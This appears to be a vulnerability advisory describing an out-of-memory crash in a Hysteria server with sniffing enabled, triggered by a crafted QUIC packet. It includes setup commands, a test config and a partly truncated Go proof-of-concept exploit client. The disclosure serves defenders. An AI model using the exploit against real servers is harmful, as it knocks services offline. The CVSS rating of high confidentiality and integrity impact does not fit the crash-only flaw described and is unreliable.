A specially constructed QUIC packet can crash the server with an out-of-memory (OOM) condition when sniffing is enabled.
When the server has sniffing enabled, a client with a valid connection can request the server to forward UDP traffic and then send a packet declaring a huge crypto length. The server allocates memory sized by this client-controlled length, causing an OOM.
# Generate a self-signed certificate/key pair for localhost (valid 365 days) used by the local test server below.
openssl req -x509 -newkey rsa:2048 -nodes -keyout localhost.key -out localhost.crt -days 365 -subj "/CN=localhost" 2>/dev/null
server.yaml
# Listening address of the test server.
listen: :8443
tls:
  # Self-signed pair produced by the openssl step above.
  cert: localhost.crt
  key: localhost.key
auth:
  type: password
  password: mypassword
sniff:
  # The reported OOM condition is only reachable when sniffing is enabled.
  enable: true
outbounds:
  - name: my_direct
    type: direct
    default: true
poc.go
package main
import (
"flag"
"fmt"
"log"
"net"
"time"
"github.com/apernet/hysteria/core/v2/client"
)
func main() {
serverAddrStr := flag.String("server", "127.0.0.1:8443", "Hysteria server address")
password := flag.String("password", "mypassword", "Hysteria server password")
flag.Parse()
serverAddr, _ := net.ResolveUDPAddr("udp", *serverAddrStr)
c, _, err := client.NewClient(&client.Config{
ServerAddr: serverAddr, Auth: *password, TLSConfig: client.TLSConfig{InsecureSkipVerify: true},
})
if err != nil {
log.Fatalf("Failed to connect: %v", err)
}
defer c.Close()
var maliciousQUICPacket = []byte{
0xcb, 0x0, 0x0, 0x0, 0x1, 0x8, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x0, 0x0,
0x32, 0x1d, 0xa8, 0xd6, 0x3c, 0x51, 0x24, 0xb7, 0xbe, 0xf2, 0x91, 0x77, 0x1c, 0x9d, 0x66,...
CVSS v3.1 base score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) — Exploitability: Attack Vector Network, Attack Complexity Low, Privileges Required Low, User Interaction None; Scope Unchanged; Impact: Confidentiality High, Integrity High, Availability High.